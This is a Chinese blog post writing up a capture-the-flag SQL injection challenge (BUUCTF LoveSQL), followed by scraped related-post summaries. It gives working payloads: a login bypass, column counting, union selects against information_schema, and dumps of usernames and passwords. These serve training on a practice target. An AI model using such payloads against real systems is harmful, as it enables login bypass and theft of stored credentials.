BUU WEB [极客大挑战 2019]LoveSQL

最新推荐文章于 2024-11-25 22:57:33 发布
最新推荐文章于 2024-11-25 22:57:33 发布
阅读量210 收藏
点赞数 1
分类专栏: WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/star_feather/article/details/112798268
版权

根据题目的名字,明显是一个SQL注入的题目,打开网页,发现是一个登陆界面,先测试一下注入点,用常用的“ ’ "试试,成功。接下来用万能密码登陆:

1' or 1=1#

随便输进去一个,另外一个填什么都可以。
在这里插入图片描述
并没有得到flag,观察URL,是以get传参的方式来注入的。近下来就是常规的先用order by来爆出有多少个字段,当尝试到4时报错,说明有3个字段:

1' order by 3# //当在url中进行时#为%23,密码随便输

在这里插入图片描述

接下来就是用联合查询找出回显点了(以下均为在url中注入,登录框太短看着不方便),

?username=1' union select 1,2,3%23&password=ads

在这里插入图片描述

得到回显点为2、3;

然后爆出数据库名:

?username=1' union select 1,database(),2%23&password=ads

在这里插入图片描述
得到数据库名为greet;

接着就该爆出表了:

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads

在这里插入图片描述
得到两个表的名字:geekuser 和 l0ve1ysq1;

接着爆字段:

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=ads

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

在这里插入图片描述
两个表爆出的字段是一样的,最后就是爆出两个表中的数据了:

?username=1' union select 1,database(),group_concat(id,username,password) from geekuser%23&password=ads

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

分别爆出两个表内的数据,就可以找到flag了。注意,flag在第二个表中,注意找哦。

关于常规的回显注入可以参考一下这篇文章:

https://www.cnblogs.com/ihacker/p/11055191.html

若作者介意请私信联系删除!!!

BUUCTF【WebLoveSQL
qq_70434663的博客
03-06 1068
我们要找的flag就在l0ve1ysq1表里面,为什么在第两张表里面,请张你的眼睛看题目。发现爆出了字段id username password,我们的flag就在password里面。接下来就是爆出字段里面的内容,步骤同上述相同。在这里注意一下,在CTF中SQL注入漏洞flag通常会放在当前使用的数据库中,这里已经有了数据库所以可以直接爆出数据库的表。既然万能用户名行不通,那么我们就使用万能密码,用户名使用admin。既然爆出了表,接下来就是爆出表里面的字段了,同样的使用payload。
Buuctf Web题解
weixin_68029979的博客
04-24 1954
写在前面, 本人小白一枚,记录一下web做题过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF WEB LOVESQL
m0_46315342的博客
08-20 1142
BUUCTF WEB LOVESQL 这个题考的是普通的联合注入,但是有一个比较坑的地方就是注释符,所以以后一定要多试试注释符。这个题是这样的,如果你直接写# 或者 --+ 这样的,就得不到想要的界面,这里需要对注释符进行url编码,换成%23这样的 设置用户名为123,密码为111登陆试一下 在用户名处设置’ “试一下 只有设置为单引号的时候有报错信息,然后试一下万能密码 ’ or 1=1# 出现了这样的情况,原因竟然是注释符要换成编码过的%23 然后就是正常的流程了(这个题目usern
2021-11-09 SQL注入---联合注入
夕阳的街道的博客
11-09 2161
aaa
buu [极客挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 2384
buu [极客挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
BUUCTF[极客挑战 2019]LoveSQL
2302_78972359的博客
05-01 372
单引号时有回显,双引号时提示WRONG,所以是单引号注入。得到一个password,登录admin用户也回显这个页面,没发现这个password有啥特别作用。得到两个表名geekuser和l0ve1ysq1,根据题目名字,最先怀疑它,先爆第二个表的字段。当输入4时回显Unkonwn column,说明该表有三个字段,查一下三个字段。根据题目提示,考察SQL注入,看一下是单引号注入还是双引号,输入。第三个字段是password,我们在用户名输入,进行联合爆表。先查一下表内有几个字段。
BUU-[极客挑战 2019]LoveSQL 1 --wp
m0_62851980的博客
07-08 1105
知识点:group_concat语法,联合查询(union)1.打开靶机,登录界面我们直接万能密码'or 1=1#登进去试试: 登入进去看到:2. 得到用户名和密码,不过拿去md5没有用,用order by查询字段数: 在增加到4的时候,报错: 3.那就说明一共有3个字段嘛,接下来我们查找回显点位,用union查询测试注入点:4.可以看到注入点为2,3,那么接下来查询数据库名和版本: 5.得到数据库名:geek,接下来我们查询表名: 注:group_concat的使用:得到当前库的所有表 :select g
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
BUUCTF [极客挑战 2019]LoveSQL
weixin_73399382的博客
04-15 967
构造payload:1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser' and table_schema='geek'%23。使用group by在4时报错说明查询列数为三,使用payload为:admin' group by 4#,url里面插入#号必须得url编码,随便找个在线编码网站把payload url编码一下。
BUUCTF [web专项10] [极客挑战 2019]LoveSQL
yanglinchiji的博客
11-02 195
再测一下回显点(修改回显点,通过回显获取数据库的具体信息)最有嫌疑的是l0ve1ysq1这个表,爆一下这个表的字段。经过测试(比如左边的1去掉单引号或者单引号换成双引号)注意:这里不能用admin了,否则不会出现回显点。通过2,3两个回显点来爆一下数据库名和版本。注意这里的表名需要用单引号括起来。出现三个字段,再爆一下内容。搜索flag直接出现。
BUUCTF WEB笔记之[极客挑战2019] EasySQL、LoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2877
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
buu_WEB [极客挑战 2019]LoveSQL1
weixin_53146913的博客
04-05 266
由于一直学sql,但是一直记不住这个最最最基本注入的过程,所以专门写一篇记录一下。 一、万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 二、 查询字段数: 在url中输入:注意:此时是在url中输入的,所以不能用#,而用其url编码%23。 /check.php?username=admin' order by 3%23&password=1 存在 /check.php?username=admin' order by 4%
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2220
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF web(二)
m0_46616663的博客
10-21 1476
[极客挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3774
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
支持pyramid2.x的kotti web代码
05-21
Kotti 是一个基于 Pyramid 框架的 Python 内容管理系统(CMS),适合用来搭建中小型网站、文档库、企业展示平台、知识库等需要灵活内容结构和权限模型的项目。它本身更像一个可以二次开发的 CMS 框架,比 WordPress、Drupal 这类“一装就用”的系统更倾向于开发者定制和扩展。 这是支持pyramid2.x版本的kotti! tar -xzvf kotti1.0.tar.gz 解压缩 进入目录执行 pip install -e . 来安装, 然后执行pserve app.ini 启动。 用浏览器浏览127.0.0.1:5000 即可浏览。 用户名admin ,口令qwerty
cmd-bat-批处理-脚本-hello world.zip
最新发布
05-21
cmd-bat-批处理-脚本-hello world.zip
知识付费系统自动采集V3.0 跳转不卡顿+搭建教程
05-21
知识付费系统自动采集V3.0 跳转不卡顿+搭建教程,不和外面的一样跳转卡顿,这个跳转不卡顿,支持三级分销。
基于Matlab实现图像形状纹理颜色特征提取
05-21
在Matlab环境下,对图像进行特征提取时,主要涵盖形状、纹理以及颜色这三关键特征。其中,对于纹理特征的提取,采用灰度梯度共生矩阵这一方法来实现。通过灰度梯度共生矩阵,可以有效地捕捉图像中像素灰度值之间在不同方向和距离上的相互关系,进而量化地反映出图像的纹理特性,为后续的图像分析、分类等任务提供重要的纹理信息依据。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值